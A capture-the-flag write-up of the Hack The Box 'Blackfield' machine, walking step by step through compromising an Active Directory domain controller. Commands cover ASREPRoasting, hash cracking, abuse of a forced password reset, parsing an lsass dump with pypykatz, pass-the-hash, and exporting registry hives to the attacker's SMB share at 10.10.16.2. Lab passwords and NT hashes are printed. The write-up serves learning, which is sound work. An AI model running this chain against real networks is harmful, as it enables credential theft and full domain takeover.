To simply our hacking journey, I highly recommend you to use Exegol. If you don’t know Exegol, it’s a hacking environment like Kali linux with a lot of powerful tools already installed.
The best features on Exegol in my opinion is :
- Powerfull history & autocompletion for commands lines with parameters already completed for you, you just need to replace values.
- Segmentation environment for pentest engagement
- Some PR in advance (Impacket)
- The latest release of tools (Bloodhound v4)
- And some more.
Are you excited about Exegol ? Just follow the instructions on Github repository. I highly recommend installing the full version (this can take a while & about 25go). Now you have installed Exegol, we are ready to go.
Reconnaissance
Let’s run a quick nmap
recon.
nmap -sS -v -Pn -T5 10.10.10.192
Based on these ports, we can assume we face a domain controller.
Let’s continue with enum4linux.
enum4linux-ng -A 10.10.10.192
This is a lot of information, firstly let’s configure our /etc/resolv.conf
with information we got for DNS resolution.
Secondly, enum4linux tell us that guest session is working on smb (line 55). It also returns that null session is working (line 53) but it’s a false positive (cf STATUS_ACCESS_DENIED
every time it’s trying dumping things with smb).
Let’s try guest session with smb using smbmap
(you can put whatever you want as guest session name).
smbmap -H 10.10.10.192 -u 'wlayzz'
Interesting, we have some uncommon shares: forensic & profiles$. We only have access to profiles$, so let’s dive in with smbclient
.
smbclient.py BLACKFIELD/wlayzz@10.10.10.192 -no-pass
It seems like we have folders labeled with users of the domain. I found nothing interesting in folders, but with all these usernames we can try ASREProast attack (learn more on thehacker.recipes).
ASREProast
To perform this technique, we need to create a file with all the usernames. Just copy-past the console output and make some bash command.
rev
command reverse stringsawk ‘{print $1}’
command to get the first column
Now with our list of users, let’s do the attack.
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users -dc-ip 10.10.10.192 BLACKFIELD.local/
On the output file ASREProastables.txt
, the script found an account support with hashed password, this is possible because Kerberos pre-authentication is not required for this user.
Moving now with hashcat to try cracking this hash.
hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt /usr/share/wordlists/rockyou.txt
Now, let’s immediately check if the cracked password for support is valid with LDAP module on CrackMapExec.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --kdcHost 10.10.10.192
I think it’s time to get an overview of relation in ActiveDirectory using BloodHound.
BloodHound
Before we start, we need to run the neo4j
database.
Then run the extraction script of bloodhound.
You must have some json files on your workdir. Next we have to import them in neo4j database.
Due to an error on bloodhound v4 we need to import files manually on the interface. Run
bloodhound
to have the interface, then click on the upload data on the right (red box on screen below).
Firstly, we are going to mark user support as owned. Search for the user on the top input.
Now let’s see the next jump we can make with this user. Click on the menu on left on search input, navigate on Analysis tab and go to Custom Queries and on Tigers love pepper part, then click on Next steps from owned users.
First thing we see is that support has ForceChangePassword right on audit2020 account.
ForceChangePassword
As support account has ForceChangePassword right on audit2020 account, we are going to change the password of this account.
net rpc password 'audit2020' '123Soleil!' -U 'BLACKFIELD'/'support'%'#00^BlackKnight' -S 'dc01.blackfield.local'
Now don’t forget to set user as owned on bloodhound and check if we can jump on another target.
No jump possible, let’s go back to smb shares and check audit2020 right.
smbmap -H 10.10.10.192 -u 'audit2020' -p '123Soleil!'
We have reading right on forensic, let’s dive into this share.
smbclient.py 'BLACKFIELD'/'audit2020':'123Soleil!'@10.10.10.192
lsass.zip looks interesting, download it with get lsass.zip
.
It seems someone dump lsass process (learn more on thehacker.recipes). On the hacker recipes we learn that a ProcDump has probably been done, also we find a command with pypykatz
to use our lsass.DMP file.
pypykatz lsa minidump lsass.dmp
We retrieve 3 accounts with their NT hashes:
- svc_backup 9658d1d1dcd9250115e2205d9f48400d
- DC01$ b624dc83a27cc29da11d9bf25efea796
- Administrator 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Pass the hash
We need to verify if these accounts works using pass the hash technique.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' --kdcHost 10.10.10.192
Only svc_backup account can authenticate and cme tell us this account is maybe admin.
Check smb shares rights.
smbmap -H 10.10.10.192 -u 'svc_backup' -p '9658d1d1dcd9250115e2205d9f48400d:9658d1d1dcd9250115e2205d9f48400d'
We can read C$, maybe our first flag here. Get into with smbclient.
smbclient.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD'/'svc_backup'@10.10.10.192
Now let’s root this box ! 😈
Mark this account as owned on bloodhound and check jumps.
Backup Operators
We can see svc_backup is member of Backup Operators. Looking on hacker recipes and this seems juicy.
Thanks to Shutdown recent pull request, we can make an attack from linux using Impacket by dumping registry hives directly on domain controller and this leads to DCSync.
To perform this attack, you need to run on a first terminal an smb server.
smbserver.py -smb2support WLAYZZ .
Then run on a second terminal the impacket script with your IP and your smb server name.
reg.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD.local/svc_backup@10.10.10.192' backup -o '\\10.10.16.2\WLAYZZ'
Dumping hives can take a moment, it’s time to take a coffee. ☕
Now that we had backup hives, we can make a secretsdump.
For an unquoted reason, pass the hash doesn’t work with Administrator account, but we got this password in clear.
cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -p '###_ADM1N_3920_###' --kdcHost 10.10.10.192
Last move to get root flag ? Let’s see.
smbclient.py 'BLACKFIELD'/'Administrator':'###_ADM1N_3920_###'@10.10.10.192
We did it. 🎉 🥳
I hope you liked this box as much as I did.
I want to thanks Shutdown for his works on the hacker recipes, exegol and Impacket. 💪
Also thanks to Euz and the Hack the box France community. 🤟
Find me on twitter Wlayzz. Good hacking 🏴☠️
Some memes about Exegol